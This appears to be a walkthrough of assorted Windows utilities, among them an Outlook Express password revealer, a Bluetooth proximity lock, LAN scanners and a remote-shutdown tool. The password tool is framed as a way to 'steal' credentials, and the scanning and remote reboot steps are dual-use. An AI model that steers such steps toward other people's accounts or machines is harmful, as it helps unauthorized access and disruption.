We ran a program oepsetup.exe which we downloaded from the site http://www.thegrideon.com/download/oepsetup.exe. When we ran the program from the start menu we saw a blank screen and clicked on the second icon in the toolbar, which displays all the outlook express passwords we have. It shows a message box telling us that, as we have not paid $19, it will show us only three letters of the password. Had we clicked on Yes it would have taken us to the web site where we could unlock the program.
The dialog shows us the server name, the e-mail id, parts of the password and the e-mail protocol used, POP3 in our case. See how simple it is to steal an outlook express password.
Bluetooth for remote locking
We download a file lockitnow.zip from the site http://www.bluetoothshareware.com/files/lockitnow.zip and run the setup program. We are asked to reboot the system, which we do. When we reload windows we are asked to specify a password that will unlock our computer whenever it gets locked. We click on the button Set Password, then the button Next and finally Finished.
We see a blue lock at the bottom of the screen; we click on it with the right mouse button and choose Settings. In the first list box we change it to Use with phone instead of the default Use without phone. We also select the radio button Bluetooth inquiry, which activates the next button, Search, which we select.
We click on the button that effectively says turn your bluetooth on. Bluetooth inquiry is a more sophisticated method than bluetooth search, where we have to specify a com port. On our machine com3 doubles up as a bluetooth port. The newer phones support bluetooth inquiry; the older ones do not.
We then see our bluetooth device's number and name in the dialog box and we click on Add so that it moves to the second dialog box, and then click on OK. If we choose several phones then, if any one of them is nearby, our computer will not be locked. However if a single phone comes into range the lock is removed. Also this works with any bluetooth device, not just phones. The bluetooth connect may be too complicated for one to use.
Now disable bluetooth on the mobile phone and do nothing for about 45 seconds. Lockitnow kicks in and we get a screen saver which locks our computer.
We can either type in our password or switch bluetooth on again on the mobile phone, and the screen saver disappears. The second tab allows us to change the period of inactivity before the screen gets locked. We set it to 1 minute and change the first two progress bars to fast. These are the lock response and unlock response times.
The first slide bar allows us to decide how fast our computer will be locked when the bluetooth device moves away. Too fast and our computer may be locked even though our bluetooth device is there, as there is no guarantee that the device will be found in time. So be happy with the defaults. The last option, Advanced, is for when we are using too many bluetooth devices and we want this program not to slow them down. You can also use this product to lock your computer normally, without a phone, on a specified schedule.
The third setting is only active if you have earlier unlocked the computer by giving a password while the phone was not present. Now if we do not press a key for a minute the computer will lock itself. If we move out of range with the phone the computer will lock itself.
The first time we ran the program all went well; the next time, after we reinstalled it, the bluetooth phone was not recognized.
We removed the pairings and then our computer found our phone as a bluetooth device. The screen saver kicks in whenever we have no activity on our machine.
lalsetup250.exe is a program called look and feel that gives us some basic information about a network; more on it later.
ccset125.exe is a program that cleans up all unwanted entities on your hard disk.
dcsetup.exe is a disk cleaner of unwanted files only.
pci_filerecovery.exe lets us recover deleted files.
everesthome200.exe is a program that displays all the information about everything on your computer.
freeproxy.zip is a working proxy server.
vnc9500.zip is the vnc client for the Symbian OS.
whois.exe is a simple program that displays all the information that we normally get when we visit apnic.net and ask for the owner of an IP address. If we write whois www.vsnl.com we get an error, as the site name is vsnl.com. Thus writing whois vsnl.com gives us more than a screen full of information.
NetworkInfo_Setup.exe is a cool program. It gives us a GUI tool that lists all our interfaces.
KeyTweak_install.exe allows us to remap keys on the keyboard. Thus the letter a can be mapped to a 1.
Siw.exe tells us tons of detail about our system. There is nothing about our computer that it does not know.
When visdir12.exe is first run it scans all the directories on our computer. It then shows us, in two panes, a list of directories and the percentage of space that each directory takes up. For example, clicking on Program Files shows us that Visual Studio takes up most of the disk space.
landiscoverysetup1.0.exe first scans your lan and tells you all the computers on your lan. It displays this information in the left pane, and when we click on any machine displayed it shows us the details of that machine.
We fired up our trusty ethereal and realized that this product uses ping to check whether a host is up, and then the SMB protocol, or Server Message Block, to figure out the details of each machine.
nview10.exe does three things: it is a web scanner, a port scanner, and it gives us a graphical interface to a network machine's details.
inftraf_setup_135.exe allows us to view traffic per interface. We first write an IP address, 70.0.0.10, in the first text box and then click on the button First Contact, and we see a list of interfaces on our machine. The first three are 1, 2 and 3, whereas the next start from 16777221. We change the interface number to the card whose traffic we are interested in capturing and then click on Start Polling. This gives us a running commentary on what is going on.
The program iOpus-SEA-setup.exe installs iOpus Secure e-mail attachments. We run the program from the start menu and click on the Create secure e-mail attachment button in the initial dialog box. At the next dialog box we have to add the files that we want to send across as attachments by clicking on the Add specific files button. At the dialog box we navigate to the file we want to add, click on Open, and repeat the same process for each file we want to add. We then click on Continue.
The program creates for us an exe file as the attachment, and we specify the name of the exe file, which gets saved in the Program Files, iopusSEA directory. We call our file vijay1 and by clicking on the check box we change the file to a zip file, vijay1.zip. This zip file in turn will contain the exe file. We have to specify a password twice, and the longer the password the more the progress bar moves towards more secure. We click on Continue and our attachment gets saved. We send this as an e-mail and when we open the zip file we see an exe file.
Running the exe file gives us a dialog box where we are asked to enter our password before we can access the attachments. Giving the right password shows us all the files in our attachment, and clicking on Continue extracts the files into the directory we specify.
The program diskview.exe does not have to be installed. We click on the second tab, Location of file, write the file name in the text box and click on Show. This shows us where on disk the file is stored by stating the virtual and logical cluster numbers and the length of the block. Check with other programs what the cluster number is all about, as specifying this number in the third tab, which displays a cluster, does not give us the contents of the file.
dskinv.exe allows us to investigate our disks, but we will find a better program.
Sequoia1_3Install.exe is a funny program; try it out.
emcoremoteshutdown.exe is downloaded from the site http://www.emco.is/downloads.html. After we execute the program we are given a dialog box that tells us that we can use this software for 15 days only, and we have to click on the Evaluate button. We click on the button Enumerate LAN and it gives us a heading Microsoft Windows Network, on which we click on the plus. This shows us, in our case, the name of our workgroup, vmukhi. Clicking on the plus shows us the machines sharing this workgroup name. We see two machines; we click on the second and drag and drop it into the second pane. We then click on the button Perform Action, which gives us a dialog box. Here we type in a message and click on OK. In seconds the other machine reboots and displays our message in a dialog box. This dialog box on the remote machine displays the number of seconds left before rebooting.